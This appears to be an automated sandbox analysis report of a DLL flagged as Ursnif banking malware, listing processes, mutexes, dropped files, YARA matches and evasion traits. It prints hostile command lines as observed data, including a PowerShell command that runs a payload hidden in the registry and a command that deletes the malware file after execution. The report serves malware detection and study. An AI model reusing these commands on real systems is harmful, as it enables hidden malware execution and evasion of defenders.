Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211006 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dbrdif.tbr.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@42/36@6/2
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F311B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 0_2_00F311B8
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{3AEAFF9F-51F4-7CA1-AB0E-15700F2219A4}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{420C970D-B9DE-C4F8-5396-FD38372A81EC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E32BD42-C5B7-60C6-3F92-C994E3E60D08}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A257D023-99F2-243B-33F6-DD98178A614C}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{DAAB2CA3-7189-1CF4-CBAE-35102FC23944}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2u2mgtylJy.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37AB0 push ecx; ret 0_2_00F37AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37E1F push ecx; ret 0_2_00F37E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7E1F push ecx; ret 3_2_032E7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7AB0 push ecx; ret 3_2_032E7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7E1F push ecx; ret 6_2_031B7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7AB0 push ecx; ret 6_2_031B7AB9
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0B1B5 push 3B000001h; retf 31_2_00A0B1BA
PE file contains an invalid checksum
Source: jdlmh2q4.dll.18.dr Static PE information: real checksum: 0x0 should be: 0x1012
Source: yg5i0oy3.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x10739
Source: 2u2mgtylJy.dll Static PE information: real checksum: 0x75958 should be: 0x72222
Source: w34iw342.dll.20.dr Static PE information: real checksum: 0x0 should be: 0xca3f
Source: 4z2qptpk.dll.33.dr Static PE information: real checksum: 0x0 should be: 0xa128
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\w34iw342.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
